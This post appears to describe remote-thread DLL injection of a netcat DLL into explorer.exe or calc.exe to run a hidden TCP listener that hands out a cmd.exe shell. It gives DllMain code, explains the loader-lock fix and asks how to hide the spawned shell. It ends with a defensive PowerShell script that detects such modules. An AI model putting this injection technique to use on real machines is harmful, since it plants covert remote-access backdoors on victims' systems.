
An example of remote-thread DLL injection: nc.dll

Note: HideDll.dll is simply nc.dll renamed (the dynamic-link-library build of netcat, the networking Swiss army knife). Once loaded into a process it behaves roughly like nc -L -p 66, a persistent listener on TCP port 66.

loader.exe is taken from the book 《Windows应用程序捆绑核心编程》 (core programming for binding Windows applications).

You can also use Load.exe from the RemoteThreadDll example in 《Windows环境下32位汇编语言程序设计》 (32-bit assembly language programming for Windows); it injects straight into explorer.exe. It does not need a PID on the command line: it locates the desktop window by the strings below (the window class 'Progman' with the title 'Program Manager'), and the process that owns that window is explorer.exe.

szDesktopClass     db    'Progman',0
szDesktopWindow    db    'Program Manager',0

To set up the build environment, download the masm32 v11 mentioned above, then the remote DLL injection example from chapter 13 of 《Windows环境下32位汇编语言程序设计》.

#include <windows.h>

/* Module handle saved at attach time for the rest of the DLL to use. */
static HINSTANCE glhInstance;

/* The DLL's real entry routine (netcat's listener loop), defined elsewhere in the
   nc.dll source. Its parameter list is not shown on this page, so it is declared
   without a prototype and cast below, exactly as the original did. It never returns. */
int EntryPoint();

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    DWORD id;                         /* thread id: CreateThread wants a DWORD*, not an int* */
    HANDLE hThread;

    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:          /* the DLL has just been mapped into the process */
        glhInstance = hinstDLL;
        /* Run the listener on its own thread. DllMain executes on the injector's
           remote thread with the loader lock held, so a call that never returns
           here would also keep LoadLibrary from ever returning. */
        hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)EntryPoint, NULL, 0, &id);
        if (hThread != NULL)
            CloseHandle(hThread);     /* the thread keeps running; the handle is not needed */
        /* EntryPoint(NULL, NULL, NULL, 0);   the original direct call; it did not work */
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

At first there was no CreateThread(): DllMain called the DLL's main function EntryPoint() directly, and although the DLL was injected it did nothing.

The fix was to start EntryPoint() on a new thread from DllMain(). The reason is that DllMain runs on the injector's remote thread, with the process loader lock held and LoadLibrary not yet returned; netcat's entry routine is a blocking listen/accept loop that never returns, so calling it directly means DllMain never completes, and anything the listener then does that itself needs the loader can deadlock on that lock.

I injected netcat.dll into calc.exe, but after connecting, cmd.exe still appears:
http://v.youku.com/v_show/id_XNTU0MzE2ODky.html
Can cmd.exe be hidden as well? (The injected DLL itself runs inside calc.exe, but the shell netcat hands the connection to is a separate cmd.exe child process started with CreateProcess, so it shows up in the process list like any other process.)

tasklist /m shows which DLLs every process has loaded, and there our dll.dll is, plainly visible!

explorer.exe                3764 ntdll.dll, kernel32.dll, ADVAPI32.dll,      
                                 RPCRT4.dll, Secur32.dll, BROWSEUI.dll,      
                                 GDI32.dll, USER32.dll, msvcrt.dll,          
                                 ole32.dll, SHLWAPI.dll, OLEAUT32.dll,       
                                 SHDOCVW.dll, CRYPT32.dll, MSASN1.dll,       
                                 CRYPTUI.dll, NETAPI32.dll, VERSION.dll,     
                                 WININET.dll, Normaliz.dll, urlmon.dll,      
                                 iertutil.dll, WINTRUST.dll, IMAGEHLP.dll,   
                                 WLDAP32.dll, SHELL32.dll, UxTheme.dll,      
                                 ShimEng.dll, AcGenral.DLL, WINMM.dll,       
                                 MSACM32.dll, USERENV.dll, IMM32.DLL,        
                                 LPK.DLL, USP10.dll, comctl32.dll,           
                                 comctl32.dll, msctfime.ime,                 
                                 GOOGLEPINYIN2.IME, MSIMG32.dll, gdiplus.dll,
                                 dbghelp.dll, appHelp.dll, CLBCATQ.DLL,      
                                 COMRes.dll, NetdiskExt.dll, MPR.dll,        
                                 PSAPI.DLL, 360UDiskGuard.dll, SETUPAPI.dll, 
                                 cscui.dll, CSCDLL.dll, themeui.dll,         
                                 xpsp2res.dll, msxml3.dll, ACTXPRXY.DLL,     
                                 SAMLIB.dll, msi.dll, LINKINFO.dll,          
                                 ntshrui.dll, ATL.DLL, ieframe.dll,          
                                 stobject.dll, BatMeter.dll, POWRPROF.dll,   
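The tasklist /m check above can be automated. The following is an added example, not from the original post: it walks every process's loaded modules (the same data tasklist /m prints) and reports any module that lives outside the Windows and Program Files directories or does not carry a valid Authenticode signature. A netcat DLL dropped in a user directory and renamed to HideDll.dll or dll.dll fails both tests. The function names and the trusted-root list are the example's own choices; it assumes a 64-bit PowerShell host, since a 32-bit host cannot read the module list of 64-bit processes, and enough rights to open the processes of interest (an elevated prompt for other users' processes).

```powershell
# Added example: flag loaded DLLs that tasklist /m would show but that do not belong.
# Modules under these roots are treated as expected; everything else is reported.
$trustedRoots = @(
    $env:SystemRoot,
    ${env:ProgramFiles},
    ${env:ProgramFiles(x86)}          # absent on 32-bit Windows, filtered out below
) | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

function Test-TrustedPath([string]$Path) {
    foreach ($root in $trustedRoots) {
        if ($Path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

function Find-SuspiciousModule {
    param([string]$ProcessName = '*')   # e.g. 'explorer' or 'calc'; '*' scans every process
    $sigCache = @{}                     # one signature check per file, not per process
    foreach ($proc in Get-Process -Name $ProcessName -ErrorAction SilentlyContinue) {
        try { $modules = $proc.Modules } catch { continue }   # access denied or cross-bitness
        foreach ($m in $modules) {
            $path = $m.FileName
            if (-not $path) { continue }
            if (-not $sigCache.ContainsKey($path)) {
                $sigCache[$path] = (Get-AuthenticodeSignature -LiteralPath $path).Status
            }
            $reasons = @()
            if (-not (Test-TrustedPath $path)) { $reasons += 'outside system directories' }
            if ($sigCache[$path] -ne 'Valid')  { $reasons += "signature $($sigCache[$path])" }
            if ($reasons) {
                [pscustomobject]@{
                    Process = $proc.ProcessName
                    PID     = $proc.Id
                    Module  = $m.ModuleName
                    Path    = $path
                    Reason  = $reasons -join '; '
                }
            }
        }
    }
}

Find-SuspiciousModule | Format-Table -AutoSize
```

Use Find-SuspiciousModule -ProcessName explorer to look at the injected host alone. One caveat: on Windows versions where system DLLs are signed only through catalog files and Get-AuthenticodeSignature does not consult the catalog, every system DLL shows NotSigned; on such hosts rely on the path test and treat the signature column as supporting evidence only.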
